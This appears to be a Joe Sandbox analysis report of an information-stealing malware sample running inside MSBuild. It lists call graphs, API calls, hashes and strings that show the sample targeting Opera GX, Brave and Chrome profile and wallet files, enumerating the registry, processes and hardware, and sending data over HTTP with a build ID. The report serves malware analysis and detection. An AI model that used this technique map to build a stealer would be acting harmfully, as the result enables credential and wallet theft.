73350->74062 73352 40eb8d 73353 40fe60 lstrcpy 73352->73353 73354 40eba5 73353->73354 73355 40fe60 lstrcpy 73354->73355 73357 40ebb5 73355->73357 73356 40e97f StrCmpCA 73368 40e950 73356->73368 73358 40fe60 lstrcpy 73357->73358 73360 40ebd1 73358->73360 73359 40ea04 StrCmpCA 73359->73368 74278 40c3f0 8 API calls 73360->74278 73362 40fe20 lstrcpy 73362->73368 73363 40ec22 73365 40fe60 lstrcpy 73363->73365 73364 40eb2b StrCmpCA 73364->73368 73367 40ec35 73365->73367 73366 40ffe0 lstrlen lstrcpy lstrcat 73366->73368 73369 40fe60 lstrcpy 73367->73369 73368->73352 73368->73356 73368->73359 73368->73362 73368->73364 73368->73366 73371 40ff50 2 API calls 73368->73371 73375 40fe60 lstrcpy 73368->73375 73377 40ff00 lstrcpy 73368->73377 73382 401120 lstrcpy 73368->73382 74066 40dfc0 73368->74066 74118 40e2f0 73368->74118 74231 40bb60 73368->74231 73371->73368 73375->73368 73377->73368 73382->73368 73610 40fe20 lstrcpy 73609->73610 73611 4024cb 73610->73611 73611->72594 73612->72594 73613->72594 73614->72594 73615->72594 73616->72564 73617->72579 73618->72543 73619->72565 73620->72523 73621->72542 73622->72506 73623->72522 73625 40fe20 lstrcpy 73624->73625 73626 4024fb 73625->73626 73626->72493 73627->72505 73629 410cf2 73628->73629 73630 410d04 73628->73630 73631 40fe20 lstrcpy 73629->73631 73632 40fe20 lstrcpy 73630->73632 73633 410cfd 73631->73633 73634 410d10 73632->73634 73633->72618 73634->72618 73635->72622 73637 404460 73636->73637 73637->73637 73638 404467 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 73637->73638 73653 4100c0 73638->73653 73640 4044b5 lstrlen 73654 4100c0 73640->73654 73642 4044c5 InternetCrackUrlA 73643 4044ea 73642->73643 73643->72631 73645 40fe20 lstrcpy 73644->73645 73646 411485 73645->73646 73647 40fe20 lstrcpy 73646->73647 73648 41149e GetSystemTime 73647->73648 73649 4114bd 73648->73649 73649->72646 73650->72756 73652 40fea8 73651->73652 73652->72681 73653->73640 73654->73642 73655->72766 73656->72946 73657->72948 73658->72950 73659->72952 73660->72956 73661->72958 73663 406f81 LocalAlloc 73662->73663 73664 406fbb 73662->73664 73663->73664 73665 406f92 CryptStringToBinaryA 73663->73665 73664->72808 73665->73664 73666 406fa9 LocalFree 73665->73666 73666->72808 73667->72966 73668->72974 73670 40fe20 lstrcpy 73669->73670 73671 40243b 73670->73671 73671->72992 73672->73009 73674 410c9a RegCloseKey CharToOemA 73673->73674 73675 410c7c RegQueryValueExA 73673->73675 73674->73023 73675->73674 73677 411a04 73676->73677 73678 4119e8 K32GetModuleFileNameExA CloseHandle 73676->73678 73679 40fe20 lstrcpy 73677->73679 73678->73677 73680 411a15 73679->73680 73680->73067 73811 4101a0 GetProcessHeap HeapAlloc RegOpenKeyExA 73681->73811 73683 410f09 73684 410f10 73683->73684 73685 410f1a RegOpenKeyExA 73683->73685 73684->73088 73686 410f52 RegCloseKey 73685->73686 73687 410f3b RegQueryValueExA 73685->73687 73686->73088 73687->73686 73689 411091 73688->73689 73690 411099 CoSetProxyBlanket 73689->73690 73691 4111ae 73689->73691 73693 4110cc 73690->73693 73692 40fe20 lstrcpy 73691->73692 73694 4111c4 73692->73694 73693->73691 73695 4110d4 73693->73695 73694->73102 73695->73694 73696 411102 VariantInit 73695->73696 73697 411126 73696->73697 73815 410f70 CoCreateInstance 73697->73815 73699 411135 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 73700 40fe20 lstrcpy 73699->73700 73701 411193 VariantClear 73700->73701 73701->73102 73703 411251 73702->73703 73704 411259 CoSetProxyBlanket 73703->73704 73705 411314 73703->73705 73707 41128c 73704->73707 73706 40fe20 lstrcpy 73705->73706 73708 41132a 73706->73708 73707->73705 73709 411294 73707->73709 73708->73116 73709->73708 73710 4112be VariantInit 73709->73710 73711 4112e2 73710->73711 73821 4115f0 LocalAlloc CharToOemW 73711->73821 73713 4112eb 73714 40fe20 lstrcpy 73713->73714 73715 4112f9 VariantClear 73714->73715 73715->73116 73716->73144 73718 40fe20 lstrcpy 73717->73718 73719 410c23 73718->73719 73719->73159 73721 40fe20 lstrcpy 73720->73721 73722 4103a8 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 73721->73722 73723 4104a2 73722->73723 73729 4103e7 73722->73729 73725 4104b0 73723->73725 73726 4104a9 LocalFree 73723->73726 73724 4103f0 GetLocaleInfoA 73724->73729 73725->73173 73726->73725 73727 40ffe0 lstrlen lstrcpy lstrcat 73727->73729 73728 40ff00 lstrcpy 73728->73729 73729->73723 73729->73724 73729->73727 73729->73728 73730->73186 73732 410332 wsprintfA 73731->73732 73733 41035b 73731->73733 73732->73733 73733->73201 73735 410515 RegQueryValueExA 73734->73735 73736 41052c RegCloseKey 73734->73736 73735->73736 73736->73218 73738 4105ac 73737->73738 73742 4105f2 73737->73742 73739 4105b0 GetLastError 73738->73739 73750 4105c3 73738->73750 73739->73738 73741 410654 73739->73741 73744 41065e 73741->73744 73825 4113f0 GetProcessHeap HeapFree 73741->73825 73824 4113f0 GetProcessHeap HeapFree 73742->73824 73743 41061b 73745 410625 wsprintfA 73743->73745 73746 41066d 73743->73746 73744->73232 73745->73232 73746->73232 73751 410648 73750->73751 73752 4105de GetLogicalProcessorInformationEx 73750->73752 73822 4113f0 GetProcessHeap HeapFree 73750->73822 73823 411410 GetProcessHeap HeapAlloc 73750->73823 73751->73232 73752->73739 73752->73742 73753->73246 73826 4113a0 73754->73826 73757 4106c0 wsprintfA 73757->73260 73760 40fe20 lstrcpy 73759->73760 73761 410728 EnumDisplayDevicesA 73760->73761 73762 4107e2 73761->73762 73763 410755 73761->73763 73762->73279 73764 40ffe0 lstrlen lstrcpy lstrcat 73763->73764 73765 40ff00 lstrcpy 73763->73765 73766 4107bd EnumDisplayDevicesA 73763->73766 73764->73763 73765->73763 73766->73762 73766->73763 73768 40fe20 lstrcpy 73767->73768 73769 410ad8 CreateToolhelp32Snapshot Process32First 73768->73769 73770 410b09 Process32Next 73769->73770 73771 410b88 CloseHandle 73769->73771 73770->73771 73774 410b1b 73770->73774 73771->73292 73772 40ff00 lstrcpy 73772->73774 73773 40ffe0 lstrlen lstrcpy lstrcat 73773->73774 73774->73772 73774->73773 73775 410b76 Process32Next 73774->73775 73775->73771 73775->73774 73777 40fe20 lstrcpy 73776->73777 73778 410832 RegOpenKeyExA 73777->73778 73779 410869 73778->73779 73795 410898 73778->73795 73781 40fe60 lstrcpy 73779->73781 73780 4108a0 RegEnumKeyExA 73782 4108ce wsprintfA RegOpenKeyExA 73780->73782 73780->73795 73783 410877 73781->73783 73785 410913 RegQueryValueExA 73782->73785 73786 410a7b RegCloseKey RegCloseKey 73782->73786 73783->73306 73784 410a41 RegCloseKey 73787 410a4f 73784->73787 73788 410943 lstrlen 73785->73788 73789 410a2c RegCloseKey 73785->73789 73786->73787 73790 40fe60 lstrcpy 73787->73790 73788->73789 73788->73795 73789->73795 73791 410a59 73790->73791 73791->73306 73792 40ff00 lstrcpy 73792->73795 73793 4109ac RegQueryValueExA 73793->73789 73793->73795 73794 40ffe0 lstrlen lstrcpy lstrcat 73794->73795 73795->73780 73795->73784 73795->73789 73795->73792 73795->73793 73795->73794 73797 415412 73796->73797 73798 40ff00 lstrcpy 73797->73798 73799 41545d 73798->73799 73800 40ff00 lstrcpy 73799->73800 73801 41547b 73800->73801 73802 40ff00 lstrcpy 73801->73802 73803 415487 73802->73803 73804 40ff00 lstrcpy 73803->73804 73805 415493 73804->73805 73806 4154b3 CreateThread WaitForSingleObject 73805->73806 73807 41549b 73805->73807 73809 40fe20 lstrcpy 73806->73809 73828 413e10 73806->73828 73808 4154a0 Sleep 73807->73808 73808->73806 73808->73808 73810 4154e7 73809->73810 73810->73328 73812 4101e5 RegQueryValueExA 73811->73812 73813 4101fb RegCloseKey 73811->73813 73812->73813 73814 41020b 73813->73814 73814->73683 73816 410f97 SysAllocString 73815->73816 73817 410ffe 73815->73817 73816->73817 73819 410fa8 73816->73819 73817->73699 73818 410ffa SysFreeString 73818->73817 73819->73818 73820 410fde _wtoi64 SysFreeString 73819->73820 73820->73818 73821->73713 73822->73750 73823->73750 73824->73743 73825->73744 73827 4106aa GlobalMemoryStatusEx 73826->73827 73827->73757 73837 4100c0 73828->73837 73830 413e3f lstrlen 73831 413e5a 73830->73831 73836 413e4f 73830->73836 73832 40fe60 lstrcpy 73831->73832 73834 40ff00 lstrcpy 73831->73834 73835 413f09 StrCmpCA 73831->73835 73838 404e40 73831->73838 73832->73831 73834->73831 73835->73831 73835->73836 73837->73830 73839 40fe60 lstrcpy 73838->73839 73840 404e7e 73839->73840 73841 404430 5 API calls 73840->73841 73842 404e8a 73841->73842 74047 411720 73842->74047 73844 404eba 73845 404ec5 lstrlen 73844->73845 73846 404ed5 73845->73846 73847 411720 4 API calls 73846->73847 73848 404ee3 73847->73848 73849 40fe20 lstrcpy 73848->73849 73850 404ef3 73849->73850 73851 40fe20 lstrcpy 73850->73851 73852 404f04 73851->73852 73853 40fe20 lstrcpy 73852->73853 73854 404f15 73853->73854 73855 40fe20 lstrcpy 73854->73855 73856 404f26 73855->73856 73857 40fe20 lstrcpy 73856->73857 73858 404f37 StrCmpCA 73857->73858 73859 404f5b 73858->73859 73860 404f87 73859->73860 73862 404f76 InternetOpenA 73859->73862 73861 411450 2 API calls 73860->73861 73863 404f92 73861->73863 73862->73860 73872 4057d5 73862->73872 73864 40ff50 2 API calls 73863->73864 73865 404fa9 73864->73865 73866 40ff00 lstrcpy 73865->73866 73867 404fb6 73866->73867 73868 40ffe0 3 API calls 73867->73868 73869 404fe1 73868->73869 73870 40ff50 2 API calls 73869->73870 73871 404ff7 73870->73871 73873 40ffe0 3 API calls 73871->73873 73874 40fe60 lstrcpy 73872->73874 73875 40500b 73873->73875 73884 405714 73874->73884 73876 40ff00 lstrcpy 73875->73876 73877 405018 73876->73877 73878 40ffe0 3 API calls 73877->73878 73884->73831 74048 411733 CryptBinaryToStringA 74047->74048 74049 41172c 74047->74049 74050 411769 74048->74050 74051 41174e GetProcessHeap HeapAlloc 74048->74051 74049->73844 74050->73844 74051->74050 74052 411771 CryptBinaryToStringA 74051->74052 74052->73844 74061->73335 74063 406dac 74062->74063 74384 406c70 74063->74384 74065 406dbf 74065->73368 74067 40fe20 lstrcpy 74066->74067 74068 40dff1 74067->74068 74437 411670 SHGetFolderPathA 74068->74437 74071 40ff50 2 API calls 74072 40e01d 74071->74072 74073 40ff00 lstrcpy 74072->74073 74074 40e02a 74073->74074 74075 40ff50 2 API calls 74074->74075 74076 40e051 74075->74076 74077 40ff00 lstrcpy 74076->74077 74119 40fe20 lstrcpy 74118->74119 74120 40e321 74119->74120 74121 40fe20 lstrcpy 74120->74121 74122 40e332 74121->74122 74123 40e34c StrCmpCA 74122->74123 74124 40e606 74123->74124 74125 40e35d 74123->74125 74127 411670 2 API calls 74124->74127 74126 411670 2 API calls 74125->74126 74128 40e366 74126->74128 74129 40e60f 74127->74129 74130 40ff50 2 API calls 74128->74130 74131 40ff50 2 API calls 74129->74131 74132 40e37a 74130->74132 74133 40e623 74131->74133 74134 40ff00 lstrcpy 74132->74134 74135 40ff00 lstrcpy 74133->74135 74136 40e387 74134->74136 74137 40e630 74135->74137 74232 40fe20 lstrcpy 74231->74232 74233 40bb90 74232->74233 74234 40fe20 lstrcpy 74233->74234 74235 40bba1 74234->74235 74236 411670 2 API calls 74235->74236 74237 40bbb1 74236->74237 74238 40ff50 2 API calls 74237->74238 74239 40bbc5 74238->74239 74240 40ff00 lstrcpy 74239->74240 74241 40bbd2 74240->74241 74242 40ff50 2 API calls 74241->74242 74243 40bbf9 74242->74243 74279 40c4f0 RegGetValueA 74278->74279 74292 40c4d8 74278->74292 74280 40c528 74279->74280 74281 40c518 74279->74281 74282 40c536 RegOpenKeyExA 74280->74282 74283 40c52c RegCloseKey 74280->74283 74281->74282 74284 40c51c RegCloseKey 74281->74284 74285 40c551 74282->74285 74286 40c569 RegEnumKeyExA 74282->74286 74283->74282 74284->74280 74285->74292 74287 40c5b0 GetProcessHeap HeapAlloc 74286->74287 74288 40c587 74286->74288 74288->74285 74289 40c58e RegCloseKey 74288->74289 74289->74285 74292->73363 74387 406ae0 74384->74387 74386 406c98 74386->74065 74388 406af3 74387->74388 74389 406afb 74387->74389 74388->74386 74404 4065a0 74389->74404 74391 406b1b 74403 406ba3 74391->74403 74410 406670 74391->74410 74393 406b2e 74393->74403 74417 406890 74393->74417 74395 406b69 74395->74403 74427 406a20 74395->74427 74397 406bb6 74397->74403 74433 4113f0 GetProcessHeap HeapFree 74397->74433 74398 406b76 74398->74397 74399 406bf5 FreeLibrary 74398->74399 74400 406c08 74398->74400 74398->74403 74399->74399 74399->74400 74432 4113f0 GetProcessHeap HeapFree 74400->74432 74403->74386 74406 4065ac 74404->74406 74405 4065b3 74405->74391 74406->74405 74407 40660d 74406->74407 74434 411410 GetProcessHeap HeapAlloc 74407->74434 74409 406622 74409->74391 74411 4066bf VirtualAlloc 74410->74411 74414 40668f 74410->74414 74412 406717 74411->74412 74413 4066e8 74411->74413 74412->74393 74415 4066f9 VirtualAlloc 74413->74415 74416 4066ee 74413->74416 74414->74411 74415->74412 74416->74393 74418 4068ab 74417->74418 74420 4068cc 74417->74420 74419 4068d5 LoadLibraryA 74418->74419 74418->74420 74421 406a01 74419->74421 74425 4068d2 74419->74425 74420->74395 74421->74395 74423 4069b6 GetProcAddress 74423->74421 74423->74425 74424 4069e5 74424->74395 74425->74419 74425->74423 74425->74424 74435 411410 GetProcessHeap HeapAlloc 74425->74435 74436 4113f0 GetProcessHeap HeapFree 74425->74436 74428 406a36 74427->74428 74429 406aab 74427->74429 74428->74429 74430 406a7f VirtualProtect 74428->74430 74429->74398 74430->74428 74431 406ab3 74430->74431 74431->74398 74432->74397 74433->74403 74434->74409 74435->74425 74436->74425 74438 40fe20 lstrcpy 74437->74438 74439 40e008 74438->74439 74439->74071

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 004164A0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 322stringfileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                              • API String ID: 1425701045-3225784412
                                                                                                                                                                                                                                              • Opcode ID: f9a939fed25fb007d3cd6773e4f62d57578648204a3180eca1f04e510bea48cb
                                                                                                                                                                                                                                              • Instruction ID: 90e794690816a6f02978cdac63616847133c7af68286edecf0343b1f7787fe60
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9a939fed25fb007d3cd6773e4f62d57578648204a3180eca1f04e510bea48cb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78C1FDB5900218ABDF10DFA4DC85EEE7779EF48704F10455EF515A3281E738AE88CBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0040D320 Relevance: 49.9, APIs: 20, Strings: 8, Instructions: 907fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1437 40d320-40d3e2 call 40fe20 call 40ff50 call 40ffe0 call 40ff00 call 40fea0 * 2 call 40fe20 * 2 call 4100c0 FindFirstFileA 1456 40d3e4-40d418 call 40fea0 * 4 1437->1456 1457 40d41d-40d429 1437->1457 1481 40df6a-40dfb5 call 40fea0 * 5 1456->1481 1458 40d430-40d444 StrCmpCA 1457->1458 1460 40df19-40df29 FindNextFileA 1458->1460 1461 40d44a-40d45e StrCmpCA 1458->1461 1460->1458 1464 40df2f-40df66 FindClose call 40fea0 * 4 1460->1464 1461->1460 1463 40d464-40d4f0 call 40feb0 call 40ff50 call 40ffe0 * 2 call 40ff00 call 40fea0 * 3 1461->1463 1506 40d656-40d6ed call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1463->1506 1507 40d4f6-40d50c call 4100c0 StrCmpCA 1463->1507 1464->1481 1556 40d6f3-40d712 call 40fea0 call 4100c0 StrCmpCA 1506->1556 1512 40d512-40d5af call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1507->1512 1513 40d5b4-40d651 call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1507->1513 1512->1556 1513->1556 1565 40d8e8-40d8fe StrCmpCA 1556->1565 1566 40d718-40d72c StrCmpCA 1556->1566 1568 40d900-40d95c call 401120 call 40fe60 * 3 call 40cf10 1565->1568 1569 40d96c-40d981 StrCmpCA 1565->1569 1566->1565 1567 40d732-40d863 call 40fe20 call 411450 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 3 call 4100c0 * 2 CopyFileA call 40fe20 call 40ffe0 * 2 call 40ff00 call 40fea0 * 2 call 40fe60 call 406e80 1566->1567 1744 40d8b1-40d8e3 call 4100c0 DeleteFileA call 410070 call 4100c0 call 40fea0 * 2 1567->1744 1745 40d865-40d8ac call 40fe60 call 401120 call 4153e0 call 40fea0 1567->1745 1624 40d961-40d967 1568->1624 1571 40d983-40d99b call 4100c0 StrCmpCA 1569->1571 1572 40d9f8-40da13 call 40fe60 call 411610 1569->1572 1584 40d9a1-40d9a5 1571->1584 1585 40de8b-40de92 1571->1585 1594 40da15-40da19 1572->1594 1595 40da8f-40daa4 StrCmpCA 1572->1595 1584->1585 1591 40d9ab-40d9f6 call 401120 call 40fe60 * 2 1584->1591 1589 40de94-40defb call 40fe60 * 2 call 40fe20 call 401120 call 40d320 1585->1589 1590 40df06-40df16 call 410070 * 2 1585->1590 1654 40df00 1589->1654 1590->1460 1641 40da6d-40da7f call 40fe60 call 407440 1591->1641 1594->1585 1602 40da1f-40da6a call 401120 call 40fe60 call 40fe20 1594->1602 1600 40daaa-40db5b call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 4100c0 * 2 CopyFileA 1595->1600 1601 40dccc-40dce1 StrCmpCA 1595->1601 1702 40db61-40dc2b call 401120 call 40fe60 * 3 call 407bd0 call 401120 call 40fe60 * 3 call 408730 1600->1702 1703 40dc2d 1600->1703 1601->1585 1610 40dce7-40dd98 call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 4100c0 * 2 CopyFileA 1601->1610 1602->1641 1707 40de68-40de7a call 4100c0 DeleteFileA call 410070 1610->1707 1708 40dd9e-40ddfb call 401120 call 40fe60 * 3 call 407fc0 1610->1708 1624->1585 1660 40da84-40da8a 1641->1660 1654->1590 1660->1585 1709 40dc33-40dc49 call 4100c0 StrCmpCA 1702->1709 1703->1709 1727 40de7f 1707->1727 1764 40de00-40de62 call 401120 call 40fe60 * 3 call 408330 1708->1764 1722 40dc4b-40dca7 call 401120 call 40fe60 * 3 call 408dc0 1709->1722 1723 40dcad-40dcbf call 4100c0 DeleteFileA call 410070 1709->1723 1722->1723 1746 40dcc4-40dcc7 1723->1746 1733 40de82-40de86 call 40fea0 1727->1733 1733->1585 1744->1565 1745->1744 1746->1733 1764->1707
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00426A8A,00426A87,00000000,?,00426BC8,?,?,00426A86,?,00000000,00000005), ref: 0040D3D4
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00426BCC), ref: 0040D43C
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00426BD0), ref: 0040D456
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426BD4,?,?,00426A8B), ref: 0040D504
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                              • String ID: Brave$E$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences$p@$p@E
                                                                                                                                                                                                                                              • API String ID: 2567437900-2467990661
                                                                                                                                                                                                                                              • Opcode ID: a4a659c085f4578309f57611426e91475dc4e9c324af32b8baff43b8d756086c
                                                                                                                                                                                                                                              • Instruction ID: ae1f48a692d5d46922722a01a953bd659f061a71a50a6572180acf0b0686347d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4a659c085f4578309f57611426e91475dc4e9c324af32b8baff43b8d756086c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0828270900248EADB14EBA5D945BDDBBB96F19304F5080BEF505732D2DB782B4CCBA6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00404500 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 537networkfilestringCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2488 404500-4045f2 call 40fe60 call 404430 call 40fe20 * 5 call 4100c0 InternetOpenA StrCmpCA 2505 4045f4 2488->2505 2506 4045fb-4045fd 2488->2506 2505->2506 2507 404603-404781 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 2 InternetConnectA 2506->2507 2508 404b68-404bf7 InternetCloseHandle call 411380 * 2 call 40fea0 * 8 2506->2508 2507->2508 2579 404787-4047bf HttpOpenRequestA 2507->2579 2580 4047c5-4047c9 2579->2580 2581 404b5b-404b65 InternetCloseHandle 2579->2581 2582 4047e1-404af3 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40fe20 call 40ff50 * 2 call 40ff00 call 40fea0 * 2 call 4100c0 lstrlen call 4100c0 * 2 lstrlen call 4100c0 HttpSendRequestA InternetReadFile 2580->2582 2583 4047cb-4047db InternetSetOptionA 2580->2583 2581->2508 2694 404af5-404afa 2582->2694 2695 404b49-404b56 InternetCloseHandle call 40fea0 2582->2695 2583->2582 2694->2695 2697 404afc-404b47 call 40ffe0 call 40ff00 call 40fea0 InternetReadFile 2694->2697 2695->2581 2697->2694 2697->2695
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00F79858,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404774
                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,00F79988,?,00F79F28,00000000,00000000,-00400100,00000000), ref: 004047B5
                                                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004047DB
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0041FDC9,?,?,?,00426885,00000000,0041FDC9,?,00000000,0041FDC9,",00000000,0041FDC9,build_id), ref: 00404AAA
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404AC3
